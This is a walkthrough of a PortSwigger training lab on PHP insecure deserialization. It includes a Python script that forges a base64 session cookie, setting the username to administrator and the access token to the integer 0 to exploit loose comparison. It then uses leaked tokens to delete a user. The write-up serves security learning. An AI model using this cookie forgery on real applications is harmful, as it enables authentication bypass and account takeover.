Portswigger Insecure Deserialization — Lab 2

Modifying serialized data types

In this lab we need to modify the serialized session cookie. The way the application deserializes it is vulnerable to an authentication bypass, which we can use to get access to the administrator account.

We can log in as wiener with the given password peter.

The session cookie can be read from the browser's developer tools; it is base64-encoded.

To understand what is happening in the serialized cookie, base64-decode it and read it field by field:

  • O:4:"User":2:{ represents a PHP object whose class name is 4 bytes long (User) and which has 2 attributes, username and access_token.
  • s:8:"username";s:6:"wiener"; represents the username attribute: the key is a string of length 8 and its value wiener is a string of length 6.
  • s:12:"access_token";s:32:"..."; represents the access_token attribute: the key is a string of length 12 and its value is a string of length 32.

We can try replacing the username in the session cookie with administrator. Because every string in the serialized format is length-prefixed, we must also update the length from s:6 to s:13, otherwise the deserializer rejects the cookie. For the access_token we can abuse PHP's loose comparison (==): if we change the token from a string to the integer 0 (i:0), the check that compares the stored string token with our value evaluates to true, because on PHP 7.x a non-numeric string compared loosely with 0 is treated as equal (PHP 8 changed this, so the trick depends on the PHP version).

https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
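The following script is an added example, not part of the original writeup or of the PortSwigger lab. It parses the subset of PHP's serialize() format seen in the cookie, rewrites the username to administrator and the access_token to the PHP integer 0, and re-encodes the object so that every length prefix is recomputed from the actual bytes. The sample cookie is constructed for the example; the class name User and the property names are assumed to match the lab. Whether i:0 actually bypasses the check is up to the server's PHP version, as noted above.

```python
import base64

# Constructed sample (not a real lab cookie): a serialized PHP User object of the
# shape the lab uses, base64-encoded the way the site stores it in the session cookie.
SAMPLE_SERIALIZED = (
    b'O:4:"User":2:{s:8:"username";s:6:"wiener";'
    b's:12:"access_token";s:32:"abcdefghijklmnopqrstuvwxyz012345";}'
)
SAMPLE_COOKIE = base64.b64encode(SAMPLE_SERIALIZED).decode()


class PhpObject:
    """A deserialized PHP object: class name plus an ordered list of properties."""
    def __init__(self, cls, props):
        self.cls = cls
        self.props = props  # list of (name, value); order is preserved on re-encode

    def get(self, name):
        return dict(self.props)[name]

    def set(self, name, value):
        self.props = [(k, value if k == name else v) for k, v in self.props]


def parse(data: bytes, pos: int = 0):
    """Parse one value from PHP serialize() output (N, b, i, s, a, O).
    Returns (value, offset after the value). String lengths are byte counts,
    which is exactly the field you must keep consistent when editing by hand."""
    tag = data[pos:pos + 1]
    if tag == b'N':                            # N;
        return None, pos + 2
    if tag in (b'b', b'i'):                    # b:1;  i:0;
        end = data.index(b';', pos)
        n = int(data[pos + 2:end])
        return (bool(n) if tag == b'b' else n), end + 1
    if tag == b's':                            # s:6:"wiener";
        colon = data.index(b':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                      # skip :"
        value = data[start:start + length]
        if data[start + length:start + length + 2] != b'";':
            raise ValueError('string length prefix does not match payload')
        return value.decode(), start + length + 2
    if tag in (b'a', b'O'):                    # a:2:{k;v;...}  O:4:"User":2:{k;v;...}
        colon = data.index(b':', pos + 2)
        n = int(data[pos + 2:colon])
        pos = colon + 2                        # skip :{ (array) or :" (object)
        cls = None
        if tag == b'O':
            cls = data[pos:pos + n].decode()   # class name of n bytes
            pos += n + 2                       # skip ":
            colon = data.index(b':', pos)
            n = int(data[pos:colon])           # property count
            pos = colon + 2                    # skip :{
        items = []
        for _ in range(n):
            k, pos = parse(data, pos)
            v, pos = parse(data, pos)
            items.append((k, v))
        value = PhpObject(cls, items) if tag == b'O' else dict(items)
        return value, pos + 1                  # skip }
    raise ValueError(f'unsupported type tag {tag!r} at offset {pos}')


def serialize(value) -> bytes:
    """Re-encode a parsed value, recomputing every length prefix from the bytes."""
    if value is None:
        return b'N;'
    if isinstance(value, bool):                # bool before int: True is an int
        return b'b:%d;' % int(value)
    if isinstance(value, int):
        return b'i:%d;' % value
    if isinstance(value, str):
        raw = value.encode()
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b''.join(serialize(k) + serialize(v) for k, v in value.items())
        return b'a:%d:{%s}' % (len(value), body)
    if isinstance(value, PhpObject):
        cls = value.cls.encode()
        body = b''.join(serialize(k) + serialize(v) for k, v in value.props)
        return b'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(value.props), body)
    raise TypeError(f'cannot serialize {type(value).__name__}')


def decode_cookie(cookie: str) -> PhpObject:
    obj, _ = parse(base64.b64decode(cookie))
    return obj


def forge_admin_cookie(cookie: str) -> str:
    """Set username to 'administrator' and access_token to the PHP integer 0
    (i:0) so the server's loose == check against the real token succeeds on
    PHP 7.x. The string length for the new username is recomputed by serialize()."""
    user = decode_cookie(cookie)
    user.set('username', 'administrator')
    user.set('access_token', 0)
    return base64.b64encode(serialize(user)).decode()


if __name__ == '__main__':
    import sys
    print(forge_admin_cookie(sys.argv[1] if len(sys.argv) > 1 else SAMPLE_COOKIE))
```

Run it with the real session cookie as the first argument and paste the output back into the session cookie; the decoded result is O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}. The parse step also explains the error you get when editing by hand: a length prefix that does not match the payload is rejected before the type juggling ever happens.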

After replacing the token we'll see an error message that reveals some access tokens. There are 3 tokens, so they are probably for carlos, wiener and administrator.

We can try each of these tokens; only vxdtpdwjbj8mhrubuejx0b2dqi8o1ky8 worked for administrator.

Now we can delete the user carlos and complete the lab.
